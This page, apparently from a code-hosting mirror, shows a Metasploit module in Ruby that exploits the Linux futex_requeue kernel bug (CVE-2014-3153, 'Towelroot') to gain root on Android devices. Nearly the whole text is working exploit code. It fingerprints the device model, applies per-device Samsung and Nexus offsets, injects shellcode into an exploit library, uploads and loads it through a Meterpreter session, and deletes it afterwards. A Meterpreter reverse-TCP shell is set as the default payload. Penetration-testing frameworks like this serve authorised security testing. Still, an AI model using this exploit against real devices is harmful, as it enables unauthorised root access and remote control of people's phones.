Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
rapid7
GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/modules/exploits/android/local/futex_requeue.rb
19934 views
1
##

2
# This module requires Metasploit: https://metasploit.com/download

3
# Current source: https://github.com/rapid7/metasploit-framework

4
##

5


6
class MetasploitModule < Msf::Exploit::Local

7
  Rank = ExcellentRanking

8


9
  include Msf::Post::File

10
  include Msf::Post::Common

11
  prepend Msf::Exploit::Remote::AutoCheck

12


13
  def initialize(info = {})

14
    super(

15
      update_info(

16
        info,

17
        {

18
          'Name' => "Android 'Towelroot' Futex Requeue Kernel Exploit",

19
          'Description' => %q{

20
            This module exploits a bug in futex_requeue in the Linux kernel, using

21
            similar techniques employed by the towelroot exploit. Any Android device

22
            with a kernel built before June 2014 is likely to be vulnerable.

23
          },

24
          'License' => MSF_LICENSE,

25
          'Author' => [

26
            'Pinkie Pie', # discovery

27
            'geohot',     # towelroot

28
            'timwr'       # metasploit module

29
          ],

30
          'References' => [

31
            [ 'CVE', '2014-3153' ],

32
            [ 'URL', 'http://tinyhack.com/2014/07/07/exploiting-the-futex-bug-and-uncovering-towelroot/' ],

33
            [ 'URL', 'http://web.archive.org/web/20160912014145/http://blog.nativeflow.com:80/the-futex-vulnerability' ],

34
          ],

35
          'DisclosureDate' => '2014-05-03',

36
          'SessionTypes' => [ 'meterpreter' ],

37
          'Platform' => [ 'android', 'linux' ],

38
          'Payload' => { 'Space' => 2048 },

39
          'DefaultOptions' => {

40
            'WfsDelay' => 300,

41
            'PAYLOAD' => 'linux/armle/meterpreter/reverse_tcp'

42
          },

43
          'Notes' => {

44
            'Stability' => [CRASH_SAFE],

45
            'SideEffects' => [],

46
            'Reliability' => [],

47
            'AKA' => ['towelroot']

48
          },

49
          'DefaultTarget' => 0,

50
          'Targets' => [

51
            # Automatic targetting via getprop ro.build.model

52
            ['Automatic Targeting', { 'auto' => true }],

53


54
            # This is the default setting, Nexus 4, 5, 7, etc

55
            [

56
              'Default',

57
              {

58
                'new_samsung' => false,

59
                'iovstack' => 2,

60
                'offset' => 0,

61
                'force_remove' => false

62
              }

63
            ],

64


65
            # Samsung devices, S3, S4, S5, etc

66
            [

67
              'New Samsung',

68
              {

69
                'new_samsung' => true,

70
                'iovstack' => 2,

71
                'offset' => 7380,

72
                'force_remove' => true

73
              }

74
            ],

75


76
            # Older Samsung devices, e.g the Note 2

77
            [

78
              'Old Samsung',

79
              {

80
                'new_samsung' => false,

81
                'iovstack' => 1,

82
                'offset' => 0,

83
                'force_remove' => true

84
              }

85
            ],

86


87
            # Samsung Galaxy Grand, etc

88
            [

89
              'Samsung Grand',

90
              {

91
                'new_samsung' => false,

92
                'iovstack' => 5,

93
                'offset' => 0,

94
                'force_remove' => true

95
              }

96
            ],

97
          ],

98
          'Compat' => {

99
            'Meterpreter' => {

100
              'Commands' => %w[

101
                core_loadlib

102
                stdapi_fs_delete_file

103
                stdapi_fs_getwd

104
              ]

105
            }

106
          }

107
        }

108
      )

109
    )

110
  end

111


112
  def check

113
    os = cmd_exec('getprop ro.build.version.release')

114
    unless Rex::Version.new(os) < Rex::Version.new('4.5.0')

115
      vprint_error "Android version #{os} does not appear to be vulnerable"

116
      return CheckCode::Safe

117
    end

118
    vprint_good "Android version #{os} appears to be vulnerable"

119


120
    CheckCode::Appears

121
  end

122


123
  def exploit

124
    if target['auto']

125
      product = cmd_exec('getprop ro.build.product')

126
      fingerprint = cmd_exec('getprop ro.build.fingerprint')

127
      print_status("Found device: #{product}")

128
      print_status("Fingerprint: #{fingerprint}")

129


130
      if [

131
        'mako',

132
        'm7',

133
        'hammerhead',

134
        'grouper',

135
        'Y530-U00',

136
        'G6-U10',

137
        'g2',

138
        'w7n',

139
        'D2303',

140
        'cancro',

141
      ].include? product

142
        my_target = targets[1] # Default

143
      elsif [

144
        'klte', # Samsung Galaxy S5

145
        'jflte', # Samsung Galaxy S4

146
        'd2vzw' # Samsung Galaxy S3 Verizon (SCH-I535 w/ android 4.4.2, kernel 3.4.0)

147
      ].include? product

148
        my_target = targets[2] # New Samsung

149
      elsif [

150
        't03g',

151
        'm0',

152
      ].include? product

153
        my_target = targets[3] # Old Samsung

154
      elsif [

155
        'baffinlite',

156
        'Vodafone_785',

157
      ].include? product

158
        my_target = targets[4] # Samsung Grand

159
      else

160
        print_status("Could not automatically target #{product}")

161
        my_target = targets[1] # Default

162
      end

163
    else

164
      my_target = target

165
    end

166


167
    print_status("Using target: #{my_target.name}")

168


169
    local_file = File.join(Msf::Config.data_directory, 'exploits', 'CVE-2014-3153.so')

170
    exploit_data = File.read(local_file, mode: 'rb')

171


172
    # Substitute the exploit shellcode with our own

173
    space = payload_space

174
    payload_encoded = payload.encoded

175
    exploit_data.gsub!("\x90" * 4 + "\x00" * (space - 4), payload_encoded + "\x90" * (payload_encoded.length - space))

176


177
    # Apply the target config

178
    offsets = my_target.opts

179
    config_buf = [

180
      offsets['new_samsung'] ? -1 : 0,

181
      offsets['iovstack'].to_i,

182
      offsets['offset'].to_i,

183
      offsets['force_remove'] ? -1 : 0,

184
    ].pack('I4')

185
    exploit_data.gsub!('c0nfig' + "\x00" * 10, config_buf)

186


187
    workingdir = session.fs.dir.getwd

188
    remote_file = "#{workingdir}/#{Rex::Text.rand_text_alpha_lower(5)}"

189
    write_file(remote_file, exploit_data)

190


191
    print_status("Loading exploit library #{remote_file}")

192
    session.core.load_library(

193
      'LibraryFilePath' => local_file,

194
      'TargetFilePath' => remote_file,

195
      'UploadLibrary' => false,

196
      'Extension' => false,

197
      'SaveToDisk' => false

198
    )

199
    print_status("Loaded library #{remote_file}, deleting")

200
    session.fs.file.rm(remote_file)

201
    print_status("Waiting #{datastore['WfsDelay']} seconds for payload")

202
  end

203
end

204


205